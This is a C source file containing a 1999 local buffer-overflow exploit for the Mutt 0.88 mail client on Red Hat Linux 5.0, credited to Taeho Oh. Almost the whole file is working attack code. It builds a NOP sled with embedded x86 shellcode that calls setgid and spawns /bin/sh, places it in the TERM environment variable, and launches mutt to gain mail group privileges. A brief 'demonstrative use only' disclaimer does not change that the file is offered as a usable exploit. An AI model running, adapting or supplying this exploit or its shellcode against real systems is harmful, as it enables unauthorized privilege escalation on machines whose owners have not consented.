/*
 
     Mutt exploit code for x86 linux
 
    Local user can gain mail group access.
 
    Tested redhat linux : 5.0
    Tested mutt : 0.88
 
    This program is only for demonstrative use only.
    USE IT AT YOUR OWN RISK!
 
    Programmed by Taeho Oh 1999/04/25
 
 Taeho Oh ( ohhara@postech.edu )            http://postech.edu/~ohhara
 PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus
 PosLUG ( Postech Linux User Group )   http://postech.edu/group/poslug
 
*/

#include <stdio.h>
#include <stdlib.h>

#define OFFSET                         -500
#define RET_POSITION                    234
#define RANGE                            20
#define NOP                            0x90
#define COMMAND                        "/bin/sh"

char shellcode[]=
  "\xeb\x29"                      /* jmp 0x29       [2000]*/
  "\x31\xc0"                      /* xorl %eax,%eax [2000]*/
  "\x31\xdb"                      /* xorl %ebx,%ebx [2000]*/
  "\xb3\x0c"                      /* movb $0xc,%bl  [2000]*/
  "\xb0\x2e"                      /* movb $0x2e,%al [2000]*/
  "\xcd\x80"                      /* int $0x80      [2000]*/
  "\x5e"                          /* popl %esi      [2000]*/
  "\x89\x76\x08"                  /* movl %esi,0x8(%esi)  */
  "\x31\xc0"                      /* xorl %eax,%eax [2000]*/
  "\x88\x46\x07"                  /* movb %eax,0x7(%esi)  */
  "\x89\x46\x0c"                  /* movl %eax,0xc(%esi)  */
  "\xb0\x0b"                      /* movb $0xb,%al  [2000]*/
  "\x89\xf3"                      /* movl %esi,%ebx [2000]*/
  "\x8d\x4e\x08"                  /* leal 0x8(%esi),%ecx  */
  "\x8d\x56\x0c"                  /* leal 0xc(%esi),%edx  */
  "\xcd\x80"                      /* int $0x80      [2000]*/
  "\x31\xdb"                      /* xorl %ebx,%ebx [2000]*/
  "\x89\xd8"                      /* movl %ebx,%eax [2000]*/
  "\x40"                          /* inc %eax       [2000]*/
  "\xcd\x80"                      /* int $0x80      [2000]*/
  "\xe8\xd2\xff\xff\xff"          /* call -0x24     [2000]*/
  "/bin/sh";                      /* .string \"/bin/sh\"  */

unsigned long get_sp(void)
{
  __asm__("movl %esp,%eax");
}

void main(int argc,char **argv)
{

  char buff[RET_POSITION+RANGE+1],*ptr;
  long *addr_ptr,addr;
  unsigned long sp;
  int offset=OFFSET,bsize=RET_POSITION+RANGE+1;
  int i;

  printf("Taeho Oh ( ohhara@postech.edu )                   http://postech.edu/~ohhara\n");
  printf("PLUS ( Postech Laboratory for Unix Security )        http://postech.edu/plus\n");
  printf("PosLUG ( Postech Linux User Group )          http://postech.edu/group/poslug\n\n");

  if(argc>1)
    offset+=atoi(argv[1]);

  sp=get_sp();
  addr=sp-offset;

  ptr=buff;
  addr_ptr=(long*)ptr;
  for(i=0;i<bsize;i+=4)
    *(addr_ptr++)=addr;

  for(i=0;i<bsize-RANGE*2-strlen(shellcode);i++)
    buff[i]=NOP;

  ptr=buff+bsize-RANGE*2-strlen(shellcode)-1;
  for(i=0;i<strlen(shellcode);i++)
    *(ptr++)=shellcode[i];

  buff[bsize-1]='\0';

  setenv("TERM",buff,1);
  execl("/usr/bin/mutt","mutt",NULL);
}
/*                    www.hack.co.za              [2000]*/